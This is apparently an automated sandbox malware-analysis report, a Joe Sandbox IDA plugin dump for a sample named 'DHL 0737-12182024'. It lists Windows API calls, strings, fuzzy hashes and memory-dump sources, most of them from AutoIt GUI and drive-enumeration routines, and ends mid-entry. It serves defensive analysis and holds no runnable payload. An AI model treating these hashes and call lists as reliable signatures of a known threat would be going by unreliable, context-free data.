                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad8b4dbc212161afdf18ab22893e63b5f5ba4a8ac9ed08f07c1778726fc0caa7
                                                                                            • Instruction ID: 43e914c5af03f8308b11b9e0a0527cff804e9c5f099cbb20f02b800f849ee3bc
                                                                                            • Opcode Fuzzy Hash: ad8b4dbc212161afdf18ab22893e63b5f5ba4a8ac9ed08f07c1778726fc0caa7
                                                                                            • Instruction Fuzzy Hash: C7618F31E2C74DA7DE389A2C4D55BBF2394FF42B08F100A5AE943DB289E712DD428356
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                            • Instruction ID: 6a3ca13c5dac3476361d76bcc370eac592a6db67bdabfe8c9f53f8ef1a1e952a
                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                            • Instruction Fuzzy Hash: 728175326080EB49DF6D427A857C03EFFE1FA923A131A07ADD4F2CB1C5EE248594D620
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                            • Instruction ID: d5ab30272ce53bc4185d4f6765597b39598a26c817eb857c559ef0242823698a
                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                            • Instruction Fuzzy Hash: 4041C4B1D1051CDBCF48CFADC991AAEBBF1EF88201F548299D516AB345D734AB41DB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9642d89f94b075b32b05954e7e131b13038ceb30fe354cf8a2634d6c7efd063a
                                                                                            • Instruction ID: fd3c2443fd0e8b297d218ea7c9bda3178d083e0d13ab014962eeef45dbd9c689
                                                                                            • Opcode Fuzzy Hash: 9642d89f94b075b32b05954e7e131b13038ceb30fe354cf8a2634d6c7efd063a
                                                                                            • Instruction Fuzzy Hash: 9C2196326206158BDB28CE79C81267A73E5F764320F19862EE4A7C37D1DE39A904CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                            • Instruction ID: 612930da59d9562ac8082abbeffec69f1b0945d94a43ad75c041f1080c39cf05
                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                            • Instruction Fuzzy Hash: 5B019278A00509EFCB58DF98C5909AEF7F5FB48310F2085D9E909A7301D734AE51DB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                            • Instruction ID: cfee393f52158726b15fd4a6f62314722524a0f9267a3d08791edbddeab533dc
                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                            • Instruction Fuzzy Hash: 3B018078A01609EFCB58DF98C5909AEF7F5FB48310F208699E809A7301D734AE51DB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 008A2B30
                                                                                            • DeleteObject.GDI32(00000000), ref: 008A2B43
                                                                                            • DestroyWindow.USER32 ref: 008A2B52
                                                                                            • GetDesktopWindow.USER32 ref: 008A2B6D
                                                                                            • GetWindowRect.USER32(00000000), ref: 008A2B74
                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 008A2CA3
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 008A2CB1
                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2CF8
                                                                                            • GetClientRect.USER32(00000000,?), ref: 008A2D04
                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008A2D40
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D62
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D75
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D80
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 008A2D89
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2D98
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 008A2DA1
                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2DA8
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008A2DB3
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2DC5
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,008BFC38,00000000), ref: 008A2DDB
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008A2DEB
                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 008A2E11
                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 008A2E30
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A2E52
                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008A303F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                            • API String ID: 2211948467-2373415609
                                                                                            • Opcode ID: ab421b7966690f2c357348725929c68c9e28ae51c7cdb1a036add75230e176ff
                                                                                            • Instruction ID: 3292371ae7bf0e930a6c4f051c8aedcb59cae4118fb3c58b25e58ec6aa76a193
                                                                                            • Opcode Fuzzy Hash: ab421b7966690f2c357348725929c68c9e28ae51c7cdb1a036add75230e176ff
                                                                                            • Instruction Fuzzy Hash: 9A025A71900219EFDB14DF68CD89EAE7BB9FB49310F108258F915EB2A1DB74AD41CB60
                                                                                            APIs
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 008B712F
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008B7160
                                                                                            • GetSysColor.USER32(0000000F), ref: 008B716C
                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 008B7186
                                                                                            • SelectObject.GDI32(?,?), ref: 008B7195
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 008B71C0
                                                                                            • GetSysColor.USER32(00000010), ref: 008B71C8
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 008B71CF
                                                                                            • FrameRect.USER32(?,?,00000000), ref: 008B71DE
                                                                                            • DeleteObject.GDI32(00000000), ref: 008B71E5
                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 008B7230
                                                                                            • FillRect.USER32(?,?,?), ref: 008B7262
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B7284
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(00000012), ref: 008B7421
                                                                                              • Part of subcall function 008B73E8: SetTextColor.GDI32(?,?), ref: 008B7425
                                                                                              • Part of subcall function 008B73E8: GetSysColorBrush.USER32(0000000F), ref: 008B743B
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(0000000F), ref: 008B7446
                                                                                              • Part of subcall function 008B73E8: GetSysColor.USER32(00000011), ref: 008B7463
                                                                                              • Part of subcall function 008B73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008B7471
                                                                                              • Part of subcall function 008B73E8: SelectObject.GDI32(?,00000000), ref: 008B7482
                                                                                              • Part of subcall function 008B73E8: SetBkColor.GDI32(?,00000000), ref: 008B748B
                                                                                              • Part of subcall function 008B73E8: SelectObject.GDI32(?,?), ref: 008B7498
                                                                                              • Part of subcall function 008B73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008B74B7
                                                                                              • Part of subcall function 008B73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008B74CE
                                                                                              • Part of subcall function 008B73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008B74DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                            • String ID:
                                                                                            • API String ID: 4124339563-0
                                                                                            • Opcode ID: ccb1ecccd6b01197a1284189af26bfee56c00caf2207513d7ab70122f86f82c2
                                                                                            • Instruction ID: 35958a5a4c1628f8a97440b991180b18086dd6b4809107da601c4a85bede440b
                                                                                            • Opcode Fuzzy Hash: ccb1ecccd6b01197a1284189af26bfee56c00caf2207513d7ab70122f86f82c2
                                                                                            • Instruction Fuzzy Hash: A9A16072008301AFDB119F64DC48E9F7BA9FB89321F100B19F9A2E62E1D775E945CB61
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?), ref: 00838E14
                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00876AC5
                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00876AFE
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00876F43
                                                                                              • Part of subcall function 00838F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00838BE8,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838FC5
                                                                                            • SendMessageW.USER32(?,00001053), ref: 00876F7F
                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00876F96
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00876FAC
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00876FB7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                            • String ID: 0
                                                                                            • API String ID: 2760611726-4108050209
                                                                                            • Opcode ID: 0df79c2995bcc95b030bbc35a5febfc2e9287c584a02fbeeaa4fe4087c610eb5
                                                                                            • Instruction ID: db3a611f91e38160193725cd4e8d1ba5914d1a4b2ebc777d105f5b60db6b4bd5
                                                                                            • Opcode Fuzzy Hash: 0df79c2995bcc95b030bbc35a5febfc2e9287c584a02fbeeaa4fe4087c610eb5
                                                                                            • Instruction Fuzzy Hash: 48129D30204A01DFDB25CF28C848BB6BBE5FB85310F548569F489DB265DB72EC61DB91
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000), ref: 008A273E
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008A286A
                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008A28A9
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008A28B9
                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 008A2900
                                                                                            • GetClientRect.USER32(00000000,?), ref: 008A290C
                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 008A2955
                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008A2964
                                                                                            • GetStockObject.GDI32(00000011), ref: 008A2974
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008A2978
                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 008A2988
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A2991
                                                                                            • DeleteDC.GDI32(00000000), ref: 008A299A
                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008A29C6
                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 008A29DD
                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 008A2A1D
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008A2A31
                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 008A2A42
                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 008A2A77
                                                                                            • GetStockObject.GDI32(00000011), ref: 008A2A82
                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008A2A8D
                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 008A2A97
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                            • API String ID: 2910397461-517079104
                                                                                            • Opcode ID: f8db8de10b42cad1e4bd5a4f6860a8a6b3d74a11519238918cb23282f4007145
                                                                                            • Instruction ID: 6c75d42d90ce44043cf85af3c07870a928579e37b9ed887a68e7e771a2f9574a
                                                                                            • Opcode Fuzzy Hash: f8db8de10b42cad1e4bd5a4f6860a8a6b3d74a11519238918cb23282f4007145
                                                                                            • Instruction Fuzzy Hash: 1BB15C71A00219AFEB24DF69DC49FAEBBA9FB49714F004214F915EB690D774ED40CBA0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00894AED
                                                                                            • GetDriveTypeW.KERNEL32(?,008BCB68,?,\\.\,008BCC08), ref: 00894BCA
                                                                                            • SetErrorMode.KERNEL32(00000000,008BCB68,?,\\.\,008BCC08), ref: 00894D36
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DriveType
                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                            • API String ID: 2907320926-4222207086
                                                                                            • Opcode ID: c0489e8f5337195d8cb82c19b8b511fbd31173668f064fa08f423cf3deb9009b
                                                                                            • Instruction ID: 2349df969a6659254fe6bcf197a1ae7a6de2e2c28764ad9a32720612c371776a
                                                                                            • Opcode Fuzzy Hash: c0489e8f5337195d8cb82c19b8b511fbd31173668f064fa08f423cf3deb9009b
                                                                                            • Instruction Fuzzy Hash: 8661C0307052499FCF04FF69CA81D6877A0FB15388B285055F816EB391EB3AED52DB42
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000012), ref: 008B7421
                                                                                            • SetTextColor.GDI32(?,?), ref: 008B7425
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008B743B
                                                                                            • GetSysColor.USER32(0000000F), ref: 008B7446
                                                                                            • CreateSolidBrush.GDI32(?), ref: 008B744B
                                                                                            • GetSysColor.USER32(00000011), ref: 008B7463
                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008B7471
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008B7482
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 008B748B
                                                                                            • SelectObject.GDI32(?,?), ref: 008B7498
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 008B74B7
                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008B74CE
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008B74DB
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B752A
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008B7554
                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 008B7572
                                                                                            • DrawFocusRect.USER32(?,?), ref: 008B757D
                                                                                            • GetSysColor.USER32(00000011), ref: 008B758E
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 008B7596
                                                                                            • DrawTextW.USER32(?,008B70F5,000000FF,?,00000000), ref: 008B75A8
                                                                                            • SelectObject.GDI32(?,?), ref: 008B75BF
                                                                                            • DeleteObject.GDI32(?), ref: 008B75CA
                                                                                            • SelectObject.GDI32(?,?), ref: 008B75D0
                                                                                            • DeleteObject.GDI32(?), ref: 008B75D5
                                                                                            • SetTextColor.GDI32(?,?), ref: 008B75DB
                                                                                            • SetBkColor.GDI32(?,?), ref: 008B75E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 1996641542-0
                                                                                            • Opcode ID: 0940d1cee0da7c2ec0d30c3c3cdab69dfbf63e9b59318b4420fcd6a599f0bce4
                                                                                            • Instruction ID: c80ca0e09a4b504aac9fac5718f3c63cf3099445789af429a87dcf7a3222084d
                                                                                            • Opcode Fuzzy Hash: 0940d1cee0da7c2ec0d30c3c3cdab69dfbf63e9b59318b4420fcd6a599f0bce4
                                                                                            • Instruction Fuzzy Hash: 4B615C72904218AFDF119FA8DC49EEEBFB9FB49320F114215F915BB2A1D7749940CBA0
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 008B1128
                                                                                            • GetDesktopWindow.USER32 ref: 008B113D
                                                                                            • GetWindowRect.USER32(00000000), ref: 008B1144
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B1199
                                                                                            • DestroyWindow.USER32(?), ref: 008B11B9
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008B11ED
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B120B
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008B121D
                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 008B1232
                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008B1245
                                                                                            • IsWindowVisible.USER32(00000000), ref: 008B12A1
                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008B12BC
                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008B12D0
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B12E8
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 008B130E
                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 008B1328
                                                                                            • CopyRect.USER32(?,?), ref: 008B133F
                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 008B13AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                            • String ID: ($0$tooltips_class32
                                                                                            • API String ID: 698492251-4156429822
                                                                                            • Opcode ID: 761fb0b1b1946b4b83a568a4973fd9ee23eca2f2f7b0e6899a0efaed170ea093
                                                                                            • Instruction ID: 4371d5f3e8250f0cf8e8e057ee67c5fa5d672450b1dc909e4923214a4ac84106
                                                                                            • Opcode Fuzzy Hash: 761fb0b1b1946b4b83a568a4973fd9ee23eca2f2f7b0e6899a0efaed170ea093
                                                                                            • Instruction Fuzzy Hash: EAB19E71604351AFDB10DF68C898BAABBE4FF88350F40891CF999DB261D771E845CB92
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008B02E5
